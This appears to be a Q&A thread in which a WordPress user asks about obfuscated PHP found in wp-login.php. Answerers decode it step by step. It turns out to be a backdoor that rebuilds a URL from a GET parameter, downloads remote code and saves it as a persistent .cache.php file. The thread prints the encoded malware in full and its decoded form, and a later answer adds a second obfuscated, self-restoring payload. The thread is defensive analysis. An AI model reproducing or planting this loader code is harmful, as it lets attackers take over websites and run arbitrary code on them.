# Encode Code inside wp-login.php wordpress

Tags: wordpress

Recently during development of my website using wordpress, i found a code inside wp-login.php

```
if(isset($_GET["\x6Co\x61\x64b\x65a\x6E"])){$WRdMt=array("NxLWXqPd"=>"\x62a\x73e6\x34_\x64\x65\x63\x6F\x64\x65","SroHZlL"=>"\x6D\x64\x35","FfqaHAg"=>"JGE9J29tbXAzWVJWVmJWMGIwYjE3bHlScWJteDInOyRiPSRfR0VUWydsb2FkYmVhbiddOyRhPXN0cl9yZXBsYWNlKGFycmF5KCRiWzJdLCRiWzRdLCRiWzFdLCRiWzldLCRiWzEwXSwkYls3XSwkYlsxMl0sJGJbMTNdLCRiWzE0XSwkYlswXSwkYlszXSksYXJyYXkoJzgnLCcuJywnOicsJ3QnLCcvJywnLycsJ2gnLCdkJywndCcsJy8nLCduJyksJGEpO2lmKGZpbHRlcl92YXIoJGEsRklMVEVSX1ZBTElEQVRFX1VSTCk9PT1mYWxzZSl7ZWNobyAnaW52YWxpZCc7ZXhpdDt9JGM9J2hwdWhmeXZxZGdrJzskZD1maWxlX2dldF9jb250ZW50cygkYSk7aWYoIXN0cmlzdHIoJGQsJGMpKXskZT1jdXJsX2luaXQoJGEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGUsQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZSxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfVVNFUkFHRU5ULCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzIuMC4xNzAwLjEwNyBTYWZhcmkvNTM3LjM2Jyk7JGQ9Y3VybF9leGVjKCRlKTtpZihjdXJsX2Vycm5vKCRlKSl7ZWNobyAnRVJST1I6IEN1cmwgRVJST1InO2V4aXQ7fWN1cmxfY2xvc2UoJGUpO2lmKCFzdHJpc3RyKCRkLCRjKSl7ZWNobyAnQ291bGQgbm90IGRsIGZpbGU6ICcuJGE7ZXhpdDt9fSRmPShzdHJwb3MoX19GSUxFX18sJygnKSE9PWZhbHNlP2Rpcm5hbWUoc3Vic3RyKF9fRklMRV9fLDAsc3RycG9zKF9fRklMRV9fLCcoJykpKTpkaXJuYW1lKF9fRklMRV9fKSkuRElSRUNUT1JZX1NFUEFSQVRPUi4nLmNhY2hlLnBocCc7aWYoIWZpbGVfcHV0X2NvbnRlbnRzKCRmLCRkKSl7ZWNobyAnQ291bGQgbm90IENSRUFURSBmaWxlOiAnLiRmO31lbHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=","NQavwLhN"=>"cr\x65\x61t\x65\x5F\x66un\x63ti\x6F\x6E");$UynkeW="\x65\x78\x74\x72\x61\x63\x74";$UynkeW($WRdMt);$CmIoaMog=$NQavwLhN('',$NxLWXqPd($FfqaHAg));$CmIoaMog();}
```

This code is not creating any problem in my sense but i don't know how this code is inserted in file. And also one more file **.Cache.php** file i found inside wp-content/themes/.cache.php
inside this file same code is present but larger than this and also copyright text is also there.
Can any one tel me what is this ?
Thanks in advance.

Comment: You've been hacked: https://codex.wordpress.org/FAQ_My_site_was_hacked

Answer (score 0):

That's some base64-encoded string with strong obfuscation in it. That might be an indication that your website has been hacked. Anyways, let's get started with the decoding.

You can start by decoding the strings inside this code (they're HEX encoded ASCII chars. You could also use an online tool like https://www.unphp.net/ for that. Then you'd get

```
<?  
    if(isset($_GET["loadbean"])){
        $WRdMt=array(
            "NxLWXqPd"=>"base64_decode",
            "SroHZlL"=>"md5",
            "FfqaHAg"=>"JGE9J29tbXAzWVJWVmJWMGIwYjE3bHlScWJteDInOyRiPSRfR0VUWydsb2FkYmVhbiddOyRhPXN0cl9yZXBsYWNlKGFycmF5KCRiWzJdLCRiWzRdLCRiWzFdLCRiWzldLCRiWzEwXSwkYls3XSwkYlsxMl0sJGJbMTNdLCRiWzE0XSwkYlswXSwkYlszXSksYXJyYXkoJzgnLCcuJywnOicsJ3QnLCcvJywnLycsJ2gnLCdkJywndCcsJy8nLCduJyksJGEpO2lmKGZpbHRlcl92YXIoJGEsRklMVEVSX1ZBTElEQVRFX1VSTCk9PT1mYWxzZSl7ZWNobyAnaW52YWxpZCc7ZXhpdDt9JGM9J2hwdWhmeXZxZGdrJzskZD1maWxlX2dldF9jb250ZW50cygkYSk7aWYoIXN0cmlzdHIoJGQsJGMpKXskZT1jdXJsX2luaXQoJGEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGUsQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZSxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfVVNFUkFHRU5ULCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzIuMC4xNzAwLjEwNyBTYWZhcmkvNTM3LjM2Jyk7JGQ9Y3VybF9leGVjKCRlKTtpZihjdXJsX2Vycm5vKCRlKSl7ZWNobyAnRVJST1I6IEN1cmwgRVJST1InO2V4aXQ7fWN1cmxfY2xvc2UoJGUpO2lmKCFzdHJpc3RyKCRkLCRjKSl7ZWNobyAnQ291bGQgbm90IGRsIGZpbGU6ICcuJGE7ZXhpdDt9fSRmPShzdHJwb3MoX19GSUxFX18sJygnKSE9PWZhbHNlP2Rpcm5hbWUoc3Vic3RyKF9fRklMRV9fLDAsc3RycG9zKF9fRklMRV9fLCcoJykpKTpkaXJuYW1lKF9fRklMRV9fKSkuRElSRUNUT1JZX1NFUEFSQVRPUi4nLmNhY2hlLnBocCc7aWYoIWZpbGVfcHV0X2NvbnRlbnRzKCRmLCRkKSl7ZWNobyAnQ291bGQgbm90IENSRUFURSBmaWxlOiAnLiRmO31lbHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=",
            "NQavwLhN"=>"create_function"
        );
        $UynkeW = "extract";
        $UynkeW($WRdMt);
        $CmIoaMog = $NQavwLhN('',$NxLWXqPd($FfqaHAg));
        $CmIoaMog();
    } 
?>
```

So this code will base64-some string, create a function out if, then call it with some argument. You can rename the variables yourself and see what does exactly. The base64-encoded code decodes in turn to

```
 <?
$a = 'ommp3YRVVbV0b0b17lyRqbmx2';
$b = $_GET['loadbean'];
$a = str_replace(array(
    $b[2],
    $b[4],
    $b[1],
    $b[9],
    $b[10],
    $b[7],
    $b[12],
    $b[13],
    $b[14],
    $b[0],
    $b[3]
), array(
    '8',
    '.',
    ':',
    't',
    '/',
    '/',
    'h',
    'd',
    't',
    '/',
    'n'
), $a);
if (filter_var($a, FILTER_VALIDATE_URL) === false) {
    echo 'invalid';
    exit;
}
$c = 'hpuhfyvqdgk';
$d = file_get_contents($a);
if (!stristr($d, $c)) {
    $e = curl_init($a);
    curl_setopt($e, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($e, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($e, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($e, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36');
    $d = curl_exec($e);
    if (curl_errno($e)) {
        echo 'ERROR: Curl ERROR';
        exit;
    }
    curl_close($e);
    if (!stristr($d, $c)) {
        echo 'Could not dl file: ' . $a;
        exit;
    }
}
$f = (strpos(__FILE__, '(') !== false ? dirname(substr(__FILE__, 0, strpos(__FILE__, '('))) : dirname(__FILE__)) . DIRECTORY_SEPARATOR . '.cache.php';
if (!file_put_contents($f, $d)) {
    echo 'Could not CREATE file: ' . $f;
} else {
    echo 'bean: http://' . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $f);
}
exit;
?>
```

This should get you started on reversing this code. (E.g. use PHPStorm or any other PHP IDE to start refactoring / renaming the variables, execute certain parts of the code to see what things they decode etc.)
Looking at it I do see some `file_put_contents()` and `file_get_contents()`, that might actually be a shell to download and upload files to your server.

Comment: Thanks for wonderful answer. Do you know how can i remove this. Because i've tried to remove the code from file but when i click save it automatically get inserted again.

Comment: No idea about removing (maybe look at the `I've been hacked` link from the comment above). I don't even know if `**// This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.**` is actually legit (from a installed plugin or Wordpress component or something) or a actual shell / malware stuff. But from your answer in which I see a ROT13 and again base64 encoding, I wouldn't take people who "encrypt" their code with these measures seriously.

Comment: Thanks alot for your response #Max. is there any way, that i would able to know what actually the code is doing there ?

Comment: since `$b = $_GET['loadbean'];` the value of `$a` is dependent on the input (there are some character substitutions going on here) , but since the substitution array contains the characters `http://` (with`8.dn` remaining), I guess `$a` should evaluate to some link. This is then downloaded using `file_get_contents()` or `cURL` if the latter fails. The downloaded stuff is then verified to contain the substring `hpuhfyvqdgk` and is saved as `.cache.php` (see `$f`) on the disk again. This is the persistancy part of the code. That's what the code does, but now idea *why* it would want to do that.

Comment: problem is not sort out yet guys. i thinks this one gone be major problem for WordPress.

Answer (score 0):

Same code but with a line, found inside theme directory in wordpress. What type of code is this and i can't delete this. every time i delete this, it restores  itself again. don know how ?

```
`**// This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.**
```

$Kx6p56uAbwra="7VRLbDY=I4FP5BvRgZTI=aGI=LQgUJGpHwSLKToLwCMazA=pwq/vaTE=XVXWZTY=ZjdnVrXIZ2U=QmN/d+ajY=CNvHHbejM=eBcdDg=P5rPQolFbzg=pZIY0xtYTA=iXWQvrLS+y/EjxyOnhgiwajg=CMckNDYeDU=paYZJVVMVWKDmMriGWH4aW4QQqDpGqtJRU7emRI2+FjiXkhP2mF6p+gnQzF/qugT01KvIXvgovSEOSxXMpCnGFudzU=TnnhIewYjM=T/bTg=QGbDQ=fVBZdWU=53pZQ4qHcGM=pdmI=mU=dgY87hQ8hdmY=d+HznZSpxzRqXyIWejk=M+hEgWhIcjE=AvremU=8+gDxTASpORhZJlnsjaCaJmbWI=qRkHjHZjk=/1RdzM=54rliMSi+OZsK+A4bhxZH3gdqzYmvjSxrPZjE=AZDk=4ktFXdjDjxOejY=KOYG6VnGTNdsiuLsn+8sjc2I=0/dDc=eTU=5arZL0Wztdzz/wKfdrtatG7zkokH5KTL6RH++INc2M=TI=FAtHdDk=RfY8NnHIpGizdpZ+emU=jdxWCZjY=hCu+vK1ljO4yZPfAjT8A3ZzA=nejQ=azQXlScDM=Au/Y6GvmFEtHuN36D2nGnZBYjM=FHdsaAdMdTM=TgtWcmY=6cmM=Dc=/iEZ8xdKipyC1jydDE=TDfoQ895AdhJXPpnHs/LRPObjI=cWI=ejE=6mG7e//7tN8eTI=pxJqZMYTY=temI=ZQLLdSwZVQ8xg/suZDY=2SYzA=7RiHvJ/F/yZGI=TY=pFpd2I=WM=mY=pqsvOcdSB/aGU=O7YmY=AUeFNvBEzBdzY=bpFRLqFvaDE=PbmI=TI=RMeScGI=EkXK0amM=qajU=azM=oaDI=8hYCL0FGKH787cTM=iaNqaZLUzlRU8IZTQ=BHrwEHbDI=PM8iUNDTPsHM0+cGY=+O1UaZ0ZzAaKQnZ2U=mY=Rbzk=Mp/5sAqcTk=UW5hqL7yoHH3jlDEY/nR+SYPYTA=1aHmYFYTQ=AfRDTIPHd/Bc2I=Dc=3pQ542ZdmU=KPRJC3cTk=OcS+Pm+aDY=VI0RdAeTU=8eDQ=4ayhoBZWI=AOWA3PF22RXXxRuXqlb2I=Ya2U=bzI=aQPGq+9VjAJlniTxQXVZmY=UaiKiLgFeWU=y/ANVctDyATQsU5dMWcTg=WjKKBUXkWttH/1ujja/yK1ZHGKRqBaTQ=fXcGM=DY=mPnlslY2Y=bDY=9cTc=DbDM=aVaK2rlwLJ9++6TlrToXokLZuwDY2Y=9Zjg=WB07AeDg=nGH1ziu+mIAAcxJiX3I73S/TozhO4PH7FgtTXygClUaTY=5MA31BbdP5bQE1kP7XP+ajU=czM=ztXbGM=qpuHci/9DDQMueDU=hdploBzxH6K5bTI=7tBwaLZFOk+0eDc=eavOwEisHBQ5C7PWkR6KiHNwSXDDhxNqpMNlh+vdVZmI=/XXW/3/djk=XORsl+Ag==";$UkSsk=strrev("edoced_4"."6esab");if(isset($_GET[str_rot13("\x71\x62b\x65")]))`